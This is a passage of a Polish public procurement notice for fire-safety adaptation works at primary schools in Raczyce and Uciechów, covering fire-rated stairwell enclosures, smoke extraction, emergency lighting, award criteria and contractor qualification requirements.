instalacji.<br/><br/>Roboty malarskie, ten zakres robót budowlanych obejmuje:<br/>a) Wykonanie robót malarskich w miejscu demontażu istniejących urządzeń i tras<br/>kablowych (listw eletroistalacyjnych),<br/>b) Wykonanie robót malarskich w miejscu prowadzenia instalacji,<br/>c) Wykonanie robót malarskich w miejscach przekucia przez ściany i strop,<br/>d) Wykonanie robót malarskich w pobliżu montażu urządzeń,<br/>e) Wykonanie robót malarskich w obszarze miejsc, gdzie nastąpiło pobrudzenie<br/>ścian lub stropu w wyniku prac montażowych.<br/><br/>Szczegółowy opis przedmiotu zamówienia zawierają projekty budowlany i pozostała dokumentacja techniczna, oraz STWIOR stanowiące załącznik do SWZ. Dodatkowo zakres obowiązków, jak również świadczeń wykonawcy określa umowa stanowiąca również załącznik do SWZ.<br/><br/>Uwaga do obowiązków wykonawcy należy również dokonanie zgłoszenia robót budowlanych zgodnie z prawem budowlanym, jak również uzyskanie jeżeli okaże się to konieczne odpowiednich decyzji, zezwoleń, opinii lub uzgodnień, w tym jeżeli okaże się konieczne pozwolenia na budowę. <br/>Obowiązkiem wykonawcy jest dokonanie we właściwym organie zawiadomienia o zakończeniu budowy lub jeżeli okaże się to konieczne uzyskanie pozwolenia na użytkowanie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45214210-5 - Roboty budowlane w zakresie szkół podstawowych</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45315100-9 - Instalacyjne roboty elektrotechniczne</p> <p class="mb-0">45315600-4 - Instalacje niskiego napięcia</p> <p class="mb-0">45315700-5 - Instalowanie stacji rozdzielczych</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45312100-8 - Instalowanie przeciwpożarowych systemów alarmowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">84 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 2. Wykonanie robót budowlanych mających na celu dostosowanie budynku Szkoły Podstawowa w Raczycach ul. Odolanowska 80 do wymagań ekspertyzy technicznej przeciwpożarowej oraz Postanowienia KW PSP w Poznaniu. <br/><br/>Przedmiotem zamówienia są roboty budowlane i pozostałe świadczenia opisane w dokumentacji technicznej i STWIOR, które stanowią załączniki do SWZ. <br/><br/>Celem zamówienia jest wykonanie w budynku szkoły podstawowe robót budowlanych i wykonanie pozostałych świadczeń w ramach przystosowania budynku do przepisów przeciwpożarowych, zgodnie z ekspertyzą przeciwpożarową oraz postanowieniem KW PSP w Poznaniu. <br/>W ramach zamówienia wykonawca zobowiązany jest do wykonania:<br/>Zadanie nr 2.1. Wykonanie robót budowlanych dostosowania budynku do wymagań ekspertyzy technicznej przeciwpożarowej oraz Postanowienia KW PSP w Poznaniu.<br/><br/>W ramach przystosowania budynku do przepisów przeciwpożarowych, zgodnie z ekspertyzą przeciwpożarową oraz postanowieniem KW PSP w Poznaniu, projektuje się: <br/>1. Obudowa klatki schodowej K1 na kondygnacji parteru i piętra. <br/>Projektuje się obudowę klatki schodowej K1 poprzez zamurowanie otworów w ścianach, wymurowanie ścian działowych o klasie odporności ogniowej REI 60 z bloczków z betonu komórkowego gr. 25 cm (grubość należy dostosować do grubości istniejących ścian) na zaprawie cienkowarstwowej, montaż witryn przeszklonych (ściany przeszklone - doświetla w klasie REI 60 odporności ogniowej) oraz montaż drzwi wewnętrznych, przeszklonych, wykonanych z profili aluminiowych, o klasie odporności ogniowej EIS 30, wyposażonymi w elektrotrzymacze, przeszklonych szkłem bezpiecznym P4, zgodnie z zestawieniem ślusarki dla każdej kondygnacji. Przy montażu drzwi należy bezwzględnie stosować się do zaleceń producenta danego systemu. <br/>Na poziomie piętra istniejące kraty należy zdemontować a otwory zamurować. <br/>UWAGA! Ze względu na wymaganą dużą precyzję, wszystkie zamówienia należy realizować dopiero po sporządzeniu obmiaru rzeczywistych wielkości otworów na budowie. <br/>Zastosowane materiały muszą spełniać wymagania i posiadać aprobaty dotyczące odpowiedniej klasy odporności ogniowej. <br/>Lokalizacja projektowanych przegród została przedstawiona na rysunkach architektonicznych poszczególnych kondygnacji. <br/><br/>2. Wymiana ślusarki drzwiowej.<br/>W obrębie klatki schodowej planuje się wymianę istniejących drzwi oraz projektuje się nowe drzwi o klasie EIS 30 odporności ogniowej, wykonane w konstrukcji aluminiowej, przeszklone szkłem bezpiecznym P4. Wymiary drzwi zgodnie z rysunkiem architektonicznym nr 2 (Rzut parteru) i nr 3 (Rzut piętra). Przeszklone ściany wewnętrzne (doświetla) projektuje się w konstrukcji aluminiowej, szklone szkłem bezpiecznym P4, w klasie odporności ogniowej REI60. <br/>Zestawy szklane w drzwiach oraz witrynach powinny spełniać minimum następujące wymagania: <br/>- grubości poszczególnych tafli szkła - wg obliczeń statycznych dostawcy szkła. <br/>- przykładowe szklenie dla poszczególnych kwater podano w zestawieniu. <br/><br/>3. Roboty tynkarskie i malarskie. <br/>Wszystkie powstałe ubytki podczas wymiany stolarki drzwiowej należy uzupełnić i przywrócić stan pierwotny elementów ścian. <br/>Po zamontowaniu nowych drzwi planuje się wykonanie obróbki ościeży wewnętrznych, poprzez przeszpachlowanie nierówności i pomalowanie farbami emulsyjnymi. <br/>Ubytki w tynkach należy naprawiać tynkiem wewnętrznym gr. min. 1 cm z gładzią gipsową <br/>Na elementach tynkowanych wykonać szpachlówkę gipsową maszynową. Wszystkie zewnętrzne narożniki muszą mieć wbudowane profile ochronne. <br/>Ściany projektowanej zabudowy klatki schodowej planuje się wykończyć gładzią gipsową i malować farbą emulsyjną w kolorze dostosowanym do kolorystki istniejących ścian. <br/><br/>4. Zabezpieczenie przepustów instalacyjnych. <br/>Projektuje się zabezpieczenie przepustów instalacyjnych o średnicy większej niż 0,04 m w ścianach i stropach kotłowni do klasy EI 60 odporności ogniowej poprzez zastosowanie specjalistycznych produktów uszczelniających do rur i kabli elektrycznych przechodzących przez przegrodę z odpornością ogniową np. firmy Promat lub innej równoważnej. <br/><br/>5. Wymiana wyłazów dachowych. <br/>Wymiana 2 wyłazów dachowych na wyłazy o klasie EI 30 odporności ogniowej. <br/>Zadanie nr 2.2. Wykonanie oddymiania klatki schodowej K1 zgodnie z przedstawionym projektem.<br/><br/>Klatkę schodową K1 planuje się wyposażyć w mechaniczny system usuwania dymu i ciepła, uruchamiany samoczynnie za pomocą systemu wykrywania dymu. Przewiduje się grawitacyjny normatywny system oddymiania. Napowietrzanie realizowane drzwiami DZ1 i/lub DZ5. Oddymianie za pomocą klapy dymowej. <br/><br/>W zakres robót wchodzą: <br/>- wyznaczenie tras kablowych, <br/>- przekucie ścian pod instalację, <br/>- montaż koryt kablowych, <br/>- rozprowadzenie przewodów/kabli zasilających, <br/>- wykonanie wszelkich połączeń elektrycznych zgodnie z projektem technicznym, <br/>- rozbudowa rozdzielnic zasilających, <br/>- montaż przycisków oddymiania, <br/>- montaż czujek dymu, <br/>- montaż elektrotrzymaczy magnetycznych, <br/>- montaż centrali oddymiania, <br/>- montaż klapy dymowej wraz z siłownikiem, <br/>- montaż siłowników na drzwiach napowietrzających, <br/>- sprawdzenie rezystancji przewodów, <br/>- sprawdzenie skuteczności działania instalacji, <br/>- roboty malarskie w miejscach montażu instalacji i urządzeń. <br/><br/>Szczegółowy zakres prac określony jest w projekcie technicznym systemu oddymiania grawitacyjnego klatki schodowej. <br/><br/>Zadanie nr 2.3. Wykonanie awaryjnego oświetlenia zgodnie z przedstawionym projektem.<br/><br/>Instalacja awaryjnego oświetlenia ewakuacyjnego na wszystkich drogach ewakuacyjnych o zwiększonym natężeniu do wartości 5 lx na podłodze wzdłuż środkowej linii drogi ewakuacyjnej. Ponadto instalacja powinna zapewniać oświetlenie przez minimum 1 godz. Oprawy awaryjnego oświetlenia ewakuacyjnego znajdują się również przed wejściem do budynku (od zewnętrznej strony). <br/><br/>Roboty instalacyjne elektryczne, ten zakres robót budowlanych obejmuje:<br/>1) wyznaczenie tras kablowych,<br/>2) przekucie ścian i stropów pod instalację,<br/>3) montaż kabli linii dozorowych w listwach elektroinstalacyjnych,<br/>4) montaż kabli sterujących,<br/>5) montaż kabli monitorujących,<br/>6) montaż elementów sterujących, kontrolnych, kontrolno-sterujących,<br/>7) montaż puszek instalacyjnych,<br/>8) rozprowadzenie przewodów/kabli zasilających,<br/>9) montaż kabli zasilających zasilacze pożarowe,<br/>10) wykonanie wszelkich połączeń elektrycznych wg projektu technicznego,<br/>11) podłączenie przewodów elektrycznych do urządzeń,<br/>12) sprawdzenie rezystancji przewodów,<br/>13) sprawdzenie skuteczności działania instalacji.<br/><br/>Roboty malarskie, ten zakres robót budowlanych obejmuje:<br/>a) Wykonanie robót malarskich w miejscu demontażu istniejących urządzeń i tras<br/>kablowych (listw eletroistalacyjnych),<br/>b) Wykonanie robót malarskich w miejscu prowadzenia instalacji,<br/>c) Wykonanie robót malarskich w miejscach przekucia przez ściany i strop,<br/>d) Wykonanie robót malarskich w pobliżu montażu urządzeń,<br/>e) Wykonanie robót malarskich w obszarze miejsc, gdzie nastąpiło pobrudzenie<br/>ścian lub stropu w wyniku prac montażowych.<br/><br/><br/>Zadanie nr 2.4. Wykonanie autonomicznych czujek dymu w starej części szkoły zgodnie z przedstawionym projektem.<br/><br/>Przewiduje się zastosowanie autonomicznych czujek dymu z wydłużonym czasem działania (z wbudowaną baterią litową) we wszystkich pomieszczeniach w starej części szkoły (segment A) z wyłączeniem pomieszczeń WC i dróg ewakuacyjnych.<br/><br/><br/>Szczegółowy opis przedmiotu zamówienia zawierają projekty budowlany i pozostała dokumentacja techniczna, oraz STWIOR stanowiące załącznik do SWZ. Dodatkowo zakres obowiązków, jak również świadczeń wykonawcy określa umowa stanowiąca również załącznik do SWZ.<br/><br/>Uwaga do obowiązków wykonawcy należy również dokonanie zgłoszenia robót budowlanych zgodnie z prawem budowlanym, jak również uzyskanie jeżeli okaże się to konieczne odpowiednich decyzji, zezwoleń, opinii lub uzgodnień, w tym jeżeli okaże się konieczne pozwolenia na budowę. <br/>Obowiązkiem wykonawcy jest dokonanie we właściwym organie zawiadomienia o zakończeniu budowy lub jeżeli okaże się to konieczne uzyskanie pozwolenia na użytkowanie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45214210-5 - Roboty budowlane w zakresie szkół podstawowych</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45315100-9 - Instalacyjne roboty elektrotechniczne</p> <p class="mb-0">45315600-4 - Instalacje niskiego napięcia</p> <p class="mb-0">45315700-5 - Instalowanie stacji rozdzielczych</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45312100-8 - Instalowanie przeciwpożarowych systemów alarmowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">84 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 3. Wykonanie robót budowlanych mających na celu dostosowanie budynku Szkoły Podstawowej w Uciechowie ul. Odolanowska 38 do wymagań ekspertyzy technicznej przeciwpożarowej oraz Postanowienia KW PSP w Poznaniu.<br/><br/>Przedmiotem zamówienia są roboty budowlane i pozostałe świadczenia opisane w dokumentacji technicznej i STWIOR, które stanowią załączniki do SWZ. <br/><br/>Celem zamówienia jest wykonanie w budynku szkoły podstawowe robót budowlanych i wykonanie pozostałych świadczeń w ramach przystosowania budynku do przepisów przeciwpożarowych, zgodnie z ekspertyzą przeciwpożarową oraz postanowieniem KW PSP w Poznaniu. <br/>W ramach zamówienia wykonawca zobowiązany jest do wykonania:<br/><br/>Zadanie nr 3.1. Wykonanie robót budowlanych dostosowania budynku do wymagań ekspertyzy technicznej przeciwpożarowej oraz Postanowienia KW PSP w Poznaniu.<br/><br/>W ramach przystosowania budynku do przepisów przeciwpożarowych, zgodnie z ekspertyzą przeciwpożarową oraz postanowieniem KW PSP w Poznaniu, projektuje się: <br/>1. Obudowa klatki schodowej K1 na kondygnacji parteru i piętra. <br/>Projektuje się obudowę klatki schodowej K1 poprzez montaż drzwi wewnętrznych, przeszklonych, wykonanych z profili aluminiowych, o klasie odporności ogniowej EIS 30, wyposażonymi w elektrotrzymacze, przeszklonych szkłem bezpiecznym P4, zgodnie z zestawieniem ślusarki dla każdej kondygnacji. Doświetla nad drzwiami w klasie REI 60 odporności ogniowej. Przy montażu drzwi należy bezwzględnie stosować się do zaleceń producenta danego systemu. <br/>Zestawy szklane w drzwiach oraz witrynach(doświetla) powinny spełniać minimum następujące wymagania: <br/>- grubości poszczególnych tafli szkła - wg obliczeń statycznych dostawcy szkła. <br/>- przykładowe szklenie dla poszczególnych kwater podano w zestawieniu. <br/><br/>UWAGA! Ze względu na wymaganą dużą precyzję, wszystkie zamówienia należy realizować dopiero po sporządzeniu obmiaru rzeczywistych wielkości otworów na budowie. <br/>Zastosowane materiały muszą spełniać wymagania i posiadać aprobaty dotyczące odpowiedniej klasy odporności ogniowej. <br/>Lokalizacja projektowanych przegród została przedstawiona na rysunkach architektonicznych poszczególnych kondygnacji. <br/>Na poziomie parteru, istniejące okno pomiędzy pomieszczeniem wiatrołapu i oddziału przedszkolnego, planuje się zamurować ścianą z bloczków z betonu komórkowego gr. 25 cm (grubość należy dostosować do grubości istniejącej ściany) na zaprawie cienkowarstwowej. <br/><br/>2. Wymiana stolarki drzwiowej.<br/><br/>Na poziomie parteru projektuje się zamknięcie drzwiami wyjścia z pomieszczenia nr 25 (szatnia) na drogę ewakuacyjną. <br/>Na poziomie parteru z pomieszczenia nr 19 (jadalnia) projektuje się wymianę drzwi przesuwnych na drzwi rozwierane. <br/>Wymiary drzwi zgodnie z rysunkiem architektonicznym nr 3 (Rzut parteru) i nr 4 (Rzut piętra 1). <br/><br/>3. Roboty tynkarskie i malarskie. <br/>Wszystkie powstałe ubytki podczas wymiany stolarki drzwiowej należy uzupełnić i przywrócić stan pierwotny elementów ścian. <br/>Po zamontowaniu nowych drzwi planuje się wykonanie obróbki ościeży wewnętrznych, poprzez przeszpachlowanie nierówności i pomalowanie farbami emulsyjnymi. <br/>Ubytki w tynkach należy naprawiać tynkiem wewnętrznym gr. min. 1 cm z gładzią gipsową <br/>Na elementach tynkowanych wykonać szpachlówkę gipsową maszynową. Wszystkie zewnętrzne narożniki muszą mieć wbudowane profile ochronne. <br/><br/>4. Wymiana wyłazu dachowego.<br/>Projektuje się wymianę wyłazu sufitowego na poddasze na wyłaz o klasie EI 30 odporności ogniowej. <br/><br/><br/>Zadanie nr 3.2. Wykonanie oddymiania klatki schodowej K1 zgodnie z przedstawionym projektem.<br/><br/>Klatkę schodową K1 planuje się wyposażyć w mechaniczny system usuwania dymu i ciepła, uruchamiany samoczynnie za pomocą systemu wykrywania dymu. Przewiduje się grawitacyjny normatywny system oddymiania. Napowietrzanie realizowane drzwiami DZ1. Oddymianie za pomocą klapy dymowej.<br/><br/>W zakres robót wchodzą: <br/>- wyznaczenie tras kablowych, <br/>- przekucie ścian pod instalację, <br/>- montaż koryt kablowych, <br/>- rozprowadzenie przewodów/kabli zasilających, <br/>- wykonanie wszelkich połączeń elektrycznych zgodnie z projektem technicznym, <br/>- rozbudowa rozdzielnic zasilających, <br/>- montaż przycisków oddymiania, <br/>- montaż czujek dymu, <br/>- montaż elektrotrzymaczy magnetycznych, <br/>- montaż centrali oddymiania, <br/>- montaż klapy dymowej wraz z siłownikiem, <br/>- montaż siłowników na drzwiach napowietrzających, <br/>- sprawdzenie rezystancji przewodów, <br/>- sprawdzenie skuteczności działania instalacji, <br/>- roboty malarskie w miejscach montażu instalacji i urządzeń. <br/><br/>Szczegółowy zakres prac określony jest w projekcie technicznym systemu oddymiania grawitacyjnego klatki schodowej. <br/><br/>Zadanie nr 3.3. Wykonanie awaryjnego oświetlenia zgodnie z przedstawionym projektem.<br/>Projektuje się zastosowanie awaryjnego oświetlenia ewakuacyjnego na wszystkich drogach ewakuacyjnych o zwiększonym natężeniu do wartości 5 lx na podłodze wzdłuż środkowej linii drogi ewakuacyjnej. Ponadto instalacja powinna zapewniać oświetlenie przez minimum 1 godz. Oprawy awaryjnego oświetlenia ewakuacyjnego znajdują się również przed wejściem do budynku (od zewnętrznej strony). <br/><br/>Roboty instalacyjne elektryczne, ten zakres robót budowlanych obejmuje:<br/>1) wyznaczenie tras kablowych,<br/>2) przekucie ścian i stropów pod instalację,<br/>3) montaż kabli linii dozorowych w listwach elektroinstalacyjnych,<br/>4) montaż kabli sterujących,<br/>5) montaż kabli monitorujących,<br/>6) montaż elementów sterujących, kontrolnych, kontrolno-sterujących,<br/>7) montaż puszek instalacyjnych,<br/>8) rozprowadzenie przewodów/kabli zasilających,<br/>9) montaż kabli zasilających zasilacze pożarowe,<br/>10) wykonanie wszelkich połączeń elektrycznych wg projektu technicznego,<br/>11) podłączenie przewodów elektrycznych do urządzeń,<br/>12) sprawdzenie rezystancji przewodów,<br/>13) sprawdzenie skuteczności działania instalacji.<br/><br/>Roboty malarskie, ten zakres robót budowlanych obejmuje:<br/>a) Wykonanie robót malarskich w miejscu demontażu istniejących urządzeń i tras<br/>kablowych (listw eletroistalacyjnych),<br/>b) Wykonanie robót malarskich w miejscu prowadzenia instalacji,<br/>c) Wykonanie robót malarskich w miejscach przekucia przez ściany i strop,<br/>d) Wykonanie robót malarskich w pobliżu montażu urządzeń,<br/>e) Wykonanie robót malarskich w obszarze miejsc, gdzie nastąpiło pobrudzenie<br/>ścian lub stropu w wyniku prac montażowych.<br/><br/>Zadanie nr 3.4. Wykonanie autonomicznych czujek dymu w starej części szkoły zgodnie z przedstawionym projektem.<br/>Przewiduje się zastosowanie autonomicznych czujek dymu z wydłużonym czasem działania (z wbudowaną baterią litową) we wszystkich pomieszczeniach w starej części szkoły (segment A) z wyłączeniem pomieszczeń WC i dróg ewakuacyjnych. <br/><br/>Szczegółowy opis przedmiotu zamówienia zawierają projekty budowlany i pozostała dokumentacja techniczna, oraz STWIOR stanowiące załącznik do SWZ. Dodatkowo zakres obowiązków, jak również świadczeń wykonawcy określa umowa stanowiąca również załącznik do SWZ.<br/><br/>Uwaga do obowiązków wykonawcy należy również dokonanie zgłoszenia robót budowlanych zgodnie z prawem budowlanym, jak również uzyskanie jeżeli okaże się to konieczne odpowiednich decyzji, zezwoleń, opinii lub uzgodnień, w tym jeżeli okaże się konieczne pozwolenia na budowę. <br/>Obowiązkiem wykonawcy jest dokonanie we właściwym organie zawiadomienia o zakończeniu budowy lub jeżeli okaże się to konieczne uzyskanie pozwolenia na użytkowanie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45214210-5 - Roboty budowlane w zakresie szkół podstawowych</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45315100-9 - Instalacyjne roboty elektrotechniczne</p> <p class="mb-0">45315600-4 - Instalacje niskiego napięcia</p> <p class="mb-0">45315700-5 - Instalowanie stacji rozdzielczych</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45312100-8 - Instalowanie przeciwpożarowych systemów alarmowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">84 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące zdolności technicznej lub zawodowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.<br/><br/>Zadanie nr 1:<br/>1) w zakresie doświadczenia zamawiający wymaga aby Wykonawca wykazał, że w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał lub wykonuje (przy czym w tym przypadku będzie uwzględniana wartość zrealizowanej części przedmiotu umowy) należycie w ramach jednej umowy co najmniej 1 zadanie polegające na przebudowie, rozbudowie lub remoncie budynku użyteczności publicznej o wartości minimum 500.000,00 zł brutto obejmujące jednocześnie: wymianę ślusarki drzwiowej lub stolarki okiennej, wykonanie systemu oddymiania i awaryjnego oświetlenia ewakuacyjnego.<br/>Przy czym zadanie ma być wykonane na podstawie jednej umowy, zamawiający nie dopuszcza sumowania mniejszych umów w celu wykazania spełniania warunku udziału. Jak również jedna umowa ma obejmować wykonanie jednocześnie wszystkich prac określonych w warunku. <br/><br/>2) warunek ten, w zakresie osób skierowanych przez wykonawcę do realizacji zamówienia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować: co najmniej jedną osobą pełniącą funkcję Kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi o specjalności konstrukcyjno - budowlanej w zakresie umożliwiającym kierowanie robotami budowlanymi obejmującymi przedmiot zamówienia lub inne ważne odpowiadające im uprawnienia budowlane wystawione na podstawie wcześniej obowiązujących przepisów, albo odpowiadające im uprawnienia wydane w innych państwach członkowskich UE, w państwach członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA), oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane, oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.<br/><br/>3) warunek ten, w zakresie osób skierowanych przez wykonawcę do realizacji zamówienia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować: co najmniej jedną osobą pełniącą funkcję Kierownika robót, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi o specjalności <br/>instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w zakresie umożliwiającym kierowanie robotami budowlanymi obejmującymi przedmiot zamówienia lub inne ważne odpowiadające im uprawnienia budowlane wystawione na podstawie wcześniej obowiązujących przepisów, albo odpowiadające im uprawnienia wydane w innych państwach członkowskich UE, w państwach członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA), oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane, oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.<br/><br/><br/>Zadania nr 2:<br/><br/>1) w zakresie doświadczenia zamawiający wymaga aby Wykonawca wykazał, że w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał lub wykonuje (przy czym w tym przypadku będzie uwzględniana wartość zrealizowanej części przedmiotu umowy) należycie w ramach jednej umowy co najmniej 1 zadanie polegające na przebudowie, rozbudowie lub remoncie budynku użyteczności publicznej o wartości minimum 420.000,00 zł brutto obejmujące jednocześnie: wymianę ślusarki drzwiowej lub stolarki okiennej, wykonanie systemu oddymiania i awaryjnego oświetlenia ewakuacyjnego.<br/>Przy czym zadanie ma być wykonane na podstawie jednej umowy, zamawiający nie dopuszcza sumowania mniejszych umów w celu wykazania spełniania warunku udziału. Jak również jedna umowa ma obejmować wykonanie jednocześnie wszystkich prac określonych w warunku. <br/><br/>2) warunek ten, w zakresie osób skierowanych przez wykonawcę do realizacji zamówienia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować: 